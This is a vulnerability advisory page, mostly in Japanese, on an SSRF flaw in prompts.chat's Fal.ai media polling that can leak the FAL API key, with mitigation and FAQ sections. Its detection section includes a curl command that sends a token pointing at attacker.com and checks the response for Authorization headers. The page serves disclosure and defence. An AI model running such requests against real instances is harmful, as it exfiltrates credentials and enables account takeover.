プラットフォーム
nodejs
コンポーネント
prompts-chat
修正版
30a8f0470e0ba45e6be9c9f55220f4a9a6b91c99
CVE-2026-22664は、prompts.chatのFal.aiメディアステータスポーリング機能におけるサーバーサイドリクエストフォージェリ(SSRF)脆弱性です。この脆弱性は、認証されたユーザーがトークンパラメータを介して攻撃者制御のURLを指定することで、任意の外部リクエストを送信することを可能にします。影響を受けるバージョンは0.0.0から30a8f0470e0ba45e6be9c9f55220f4a9a6b91c99です。修正バージョンは30a8f0470e0ba45e6be9c9f55220f4a9a6b91c99で、アップデートを推奨します。
このSSRF脆弱性を悪用されると、攻撃者はFal.aiメディアステータスポーリング機能を通じて任意の外部リクエストを送信できます。具体的には、攻撃者はトークンパラメータに悪意のあるURLを挿入し、サーバーがそのURLにリクエストを送信させることができます。これにより、内部ネットワークへのアクセス、機密情報の漏洩、さらにはFal.aiアカウントの不正利用といった深刻な被害が発生する可能性があります。特に、攻撃者はFALAPIKEYをAuthorizationヘッダーから盗み出し、そのキーを使用してFal.aiアカウントを乗っ取り、内部リソースへのアクセスや悪意のある活動を行うことが考えられます。この脆弱性は、認証されたユーザーが利用可能であるため、内部不正のリスクも考慮する必要があります。
CVE-2026-22664は、2026年4月3日に公開されました。現時点では、この脆弱性を悪用した具体的な攻撃事例は報告されていませんが、SSRF脆弱性は一般的に悪用されやすい脆弱性であるため、注意が必要です。CISA KEVカタログへの登録状況は不明です。公開されているPoCは確認されていませんが、SSRF脆弱性の一般的な攻撃手法が適用可能であると考えられます。
Organizations utilizing prompts.chat for internal communication or AI-powered chatbot applications are at risk. Specifically, deployments that rely on Fal.ai for media processing or storage are particularly vulnerable. Shared hosting environments where multiple users share the same prompts.chat instance should be carefully assessed, as a compromised account could impact other users.
• nodejs / server: Monitor application logs for outbound requests to unusual or unexpected domains. Use lsof or netstat to identify processes making outbound connections to suspicious IP addresses or ports.
lsof -i | grep prompts.chat• generic web: Use curl to test the media status polling endpoint with a crafted URL containing a known malicious domain. Examine the response headers for any signs of credential leakage.
curl -v 'https://your-prompts-chat-instance/api/media_status?token=https://attacker.com' 2>&1 | grep Authorizationdisclosure
エクスプロイト状況
EPSS
0.03% (9% パーセンタイル)
CISA SSVC
この脆弱性への対応策として、まず、prompts.chatを修正バージョン30a8f0470e0ba45e6be9c9f55220f4a9a6b91c99にアップデートすることを強く推奨します。アップデートが直ちに実行できない場合は、WAF(Web Application Firewall)やリバースプロキシを設定し、トークンパラメータに渡されるURLを検証するルールを実装することで、攻撃を軽減できます。具体的には、許可されたドメインのみを許可する、URLスキームを検証する、リダイレクトを禁止するなどのルールを適用します。また、Fal.ai APIキーのローテーションを定期的に実施し、漏洩した場合の影響を最小限に抑えることも重要です。アップデート後、Fal.ai APIキーが漏洩していないか、アクセスログなどを確認し、脆弱性の影響を受けていないことを確認してください。
prompts.chat を commit 30a8f0470e0ba45e6be9c9f55220f4a9a6b91c99 を含むバージョンにアップデートしてください。この修正により、Fal.ai メディアステータスのポーリング中にトークンパラメータで提供されるURLが検証され、SSRF の脆弱性が軽減されます。
脆弱性分析と重要アラートをメールでお届けします。
CVE-2026-22664は、prompts.chatのFal.aiメディアステータスポーリング機能におけるサーバーサイドリクエストフォージェリ(SSRF)脆弱性です。認証されたユーザーが任意の外部リクエストを送信できる可能性があります。
prompts.chatのバージョンが0.0.0から30a8f0470e0ba45e6be9c9f55220f4a9a6b91c99の間にFal.aiメディアステータスポーリング機能を有効にしている場合、影響を受けます。
prompts.chatを修正バージョン30a8f0470e0ba45e6be9c9f55220f4a9a6b91c99にアップデートしてください。アップデートできない場合は、WAFなどの対策を講じてください。
現時点では、CVE-2026-22664を悪用した具体的な攻撃事例は報告されていませんが、SSRF脆弱性は一般的に悪用されやすい脆弱性であるため、注意が必要です。
公式のアドバイザリは、prompts.chatのリリースノートまたはGitHubリポジトリで確認できます。
CVSS ベクトル